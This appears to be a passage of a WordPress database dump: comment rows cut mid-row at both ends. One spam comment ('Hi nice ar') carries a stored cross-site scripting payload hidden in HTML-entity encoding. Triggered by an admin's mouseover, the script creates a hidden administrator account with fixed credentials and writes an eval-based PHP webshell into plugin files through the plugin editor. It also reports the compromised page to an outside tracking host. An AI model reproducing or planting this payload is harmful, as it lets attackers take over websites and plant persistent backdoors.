&#111;&#040;&#039;&#087;&#101;&#098;&#115;&#104;&#101;&#108;&#108;&#65306;&#039;&#043;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#116;&#101;&#109;&#112;&#044;&#034;&#119;&#112;&#045;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#047;&#112;&#108;&#117;&#103;&#105;&#110;&#115;&#047;&#034;&#043;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#041;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#125;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#102;&#097;&#105;&#108;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#101;&#114;&#114;&#111;&#114;&#034;&#041;&#059;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#097;&#108;&#119;&#097;&#121;&#115;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#125;&#041;&#059;\" style=\"display:block;position:absolute;width:100%;height:100%;top:0;left:0;\" \'><a></abbr></a>', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(149, 1, 'biezou', 'miwmgt@gmail.com', 'http://www.facebook.com/inaaapnte2b', '115.113.174.21', '2015-11-11 21:40:58', '2015-11-11 21:40:58', 'Hi nice ar zsAk<abbr><a href=\'\r\nhref=\"\'> :-) <abbr title=\'\" onmouseover=\"&#118;&#097;&#114;&#032;&#097;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#112;&#108;&#105;&#116;&#040;&#039;&#047;&#039;&#041;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#120;&#117;&#114;&#108;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#097;&#091;&#097;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#045;&#049;&#093;&#044;&#034;&#117;&#115;&#101;&#114;&#045;&#110;&#101;&#119;&#046;&#112;&#104;&#112;&#034;&#041;&#059;&#010;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#112;&#117;&#114;&#108;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#097;&#091;&#097;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#045;&#049;&#093;&#044;&#034;&#112;&#108;&#117;&#103;&#105;&#110;&#045;&#101;&#100;&#105;&#116;&#111;&#114;&#046;&#112;&#104;&#112;&#034;&#041;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#050;&#032;&#061;&#032;&#091;&#039;&#104;&#101;&#108;&#108;&#111;&#046;&#112;&#104;&#112;&#039;&#093;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#083;&#116;&#097;&#114;&#116;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#032;&#061;&#032;&#049;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#060;&#063;&#112;&#104;&#112;&#092;&#110;&#105;&#102;&#040;&#105;&#115;&#115;&#101;&#116;&#040;&#036;&#095;&#080;&#079;&#083;&#084;&#091;&#039;&#100;&#097;&#107;&#039;&#093;&#041;&#041;&#123;&#040;&#036;&#119;&#119;&#119;&#032;&#061;&#032;&#036;&#095;&#080;&#079;&#083;&#084;&#091;&#039;&#100;&#097;&#107;&#039;&#093;&#041;&#032;&#038;&#038;&#032;&#064;&#112;&#114;&#101;&#103;&#095;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#047;&#097;&#100;&#047;&#101;&#039;&#044;&#032;&#039;&#064;&#039;&#032;&#046;&#032;&#115;&#116;&#114;&#095;&#114;&#111;&#116;&#049;&#051;&#040;&#039;&#114;&#105;&#110;&#121;&#039;&#041;&#032;&#046;&#032;&#039;&#040;&#036;&#119;&#119;&#119;&#041;&#039;&#044;&#032;&#039;&#097;&#100;&#100;&#039;&#041;&#059;&#101;&#120;&#105;&#116;&#059;&#125;&#034;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#108;&#097;&#117;&#114;&#108;&#032;&#061;&#032;&#034;&#104;&#116;&#116;&#112;&#058;&#047;&#047;&#119;&#101;&#098;&#046;&#053;&#049;&#046;&#108;&#097;&#058;&#056;&#050;&#047;&#103;&#111;&#046;&#097;&#115;&#112;&#034;&#059;&#010;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#120;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#071;&#069;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#084;&#121;&#112;&#101;&#058;&#032;&#039;&#104;&#116;&#109;&#108;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#125;&#044;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#095;&#099;&#114;&#101;&#097;&#116;&#101;&#045;&#117;&#115;&#101;&#114;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#061;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#120;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#032;&#039;&#099;&#114;&#101;&#097;&#116;&#101;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#095;&#099;&#114;&#101;&#097;&#116;&#101;&#045;&#117;&#115;&#101;&#114;&#039;&#058;&#088;&#116;&#111;&#107;&#101;&#110;&#044;&#039;&#117;&#115;&#101;&#114;&#095;&#108;&#111;&#103;&#105;&#110;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#101;&#109;&#097;&#105;&#108;&#039;&#058;&#039;&#114;&#111;&#111;&#116;&#064;&#120;&#115;&#115;&#049;&#046;&#099;&#111;&#109;&#039;&#044;&#039;&#102;&#105;&#114;&#115;&#116;&#095;&#110;&#097;&#109;&#101;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#108;&#097;&#115;&#116;&#095;&#110;&#097;&#109;&#101;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#117;&#114;&#108;&#039;&#058;&#039;&#119;&#119;&#119;&#046;&#120;&#115;&#115;&#049;&#046;&#099;&#111;&#109;&#039;&#044;&#039;&#112;&#097;&#115;&#115;&#049;&#039;&#058;&#039;&#111;&#098;&#112;&#097;&#115;&#115;&#039;&#044;&#039;&#112;&#097;&#115;&#115;&#050;&#039;&#058;&#039;&#111;&#098;&#112;&#097;&#115;&#115;&#039;&#044;&#039;&#114;&#111;&#108;&#101;&#039;&#058;&#039;&#097;&#100;&#109;&#105;&#110;&#105;&#115;&#116;&#114;&#097;&#116;&#111;&#114;&#039;&#044;&#039;&#099;&#114;&#101;&#097;&#116;&#101;&#117;&#115;&#101;&#114;&#039;&#058;&#039;&#065;&#100;&#100;&#043;&#078;&#101;&#119;&#043;&#085;&#115;&#101;&#114;&#043;&#039;&#125;&#010;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#039;&#111;&#107;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#010;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#108;&#097;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#071;&#069;&#084;&#039;&#044;&#010;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#115;&#118;&#105;&#100;&#039;&#058;&#049;&#051;&#044;&#039;&#105;&#100;&#039;&#058;&#049;&#056;&#054;&#052;&#054;&#056;&#053;&#050;&#044;&#039;&#118;&#112;&#097;&#103;&#101;&#039;&#058;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#125;&#010;&#032;&#032;&#125;&#041;&#032;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#102;&#097;&#105;&#108;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#101;&#114;&#114;&#111;&#114;&#034;&#041;&#059;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#097;&#108;&#119;&#097;&#121;&#115;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#125;&#041;&#059;&#010;&#010;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#071;&#069;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#084;&#121;&#112;&#101;&#058;&#032;&#039;&#104;&#116;&#109;&#108;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#125;&#044;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#061;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#116;&#101;&#120;&#116;&#097;&#114;&#101;&#097;&#035;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#060;&#063;&#112;&#104;&#112;&#039;&#044;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#100;&#105;&#118;&#046;&#097;&#108;&#105;&#103;&#110;&#108;&#101;&#102;&#116;&#032;&#098;&#105;&#103;&#032;&#115;&#116;&#114;&#111;&#110;&#103;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#102;&#105;&#108;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#105;&#102;&#040;&#088;&#116;&#111;&#107;&#101;&#110;&#038;&#038;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#038;&#038;&#102;&#105;&#108;&#101;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#058;&#088;&#116;&#111;&#107;&#101;&#110;&#044;&#039;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#058;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#044;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#039;&#117;&#112;&#100;&#097;&#116;&#101;&#039;&#044;&#039;&#102;&#105;&#108;&#101;&#039;&#058;&#102;&#105;&#108;&#101;&#044;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#102;&#105;&#108;&#101;&#044;&#039;&#115;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#085;&#112;&#100;&#097;&#116;&#101;&#043;&#070;&#105;&#108;&#101;&#039;&#125;&#032;&#010;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#117;&#098;&#115;&#116;&#114;&#105;&#110;&#103;&#040;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#105;&#110;&#100;&#101;&#120;&#079;&#102;&#040;&#039;&#119;&#112;&#045;&#097;&#100;&#109;&#105;&#110;&#039;&#041;&#044;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#105;&#110;&#102;&#111;&#040;&#039;&#087;&#101;&#098;&#115;&#104;&#101;&#108;&#108;&#65306;&#039;&#043;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#116;&#101;&#109;&#112;&#044;&#034;&#119;&#112;&#045;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#047;&#112;&#108;&#117;&#103;&#105;&#110;&#115;&#047;&#034;&#043;&#102;&#105;&#108;&#101;&#041;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#010;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#105;&#102;&#040;&#083;&#116;&#097;&#114;&#116;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#102;&#111;&#114;&#040;&#118;&#097;&#114;&#032;&#105;&#061;&#048;&#059;&#105;&#060;&#102;&#105;&#108;&#101;&#050;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#059;&#105;&#043;&#043;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#032;&#061;&#032;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#105;&#102;&#040;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#033;&#061;&#102;&#105;&#108;&#101;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#032;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#044;&#039;&#083;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#083;&#101;&#108;&#101;&#099;&#116;&#039;&#125;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#046;&#102;&#105;&#110;&#100;&#040;&#034;&#116;&#101;&#120;&#116;&#097;&#114;&#101;&#097;&#035;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#034;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#060;&#063;&#112;&#104;&#112;&#039;&#044;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#046;&#102;&#105;&#110;&#100;&#040;&#034;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#034;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#105;&#102;&#040;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#038;&#038;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#049;&#034;&#043;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#058;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#044;&#039;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#058;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#044;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#039;&#117;&#112;&#100;&#097;&#116;&#101;&#039;&#044;&#039;&#102;&#105;&#108;&#101;&#039;&#058;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#044;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#044;&#039;&#115;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#085;&#112;&#100;&#097;&#116;&#101;&#043;&#070;&#105;&#108;&#101;&#039;&#125;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#117;&#098;&#115;&#116;&#114;&#105;&#110;&#103;&#040;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#105;&#110;&#100;&#101;&#120;&#079;&#102;&#040;&#039;&#119;&#112;&#045;&#097;&#100;&#109;&#105;&#110;&#039;&#041;&#044;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#04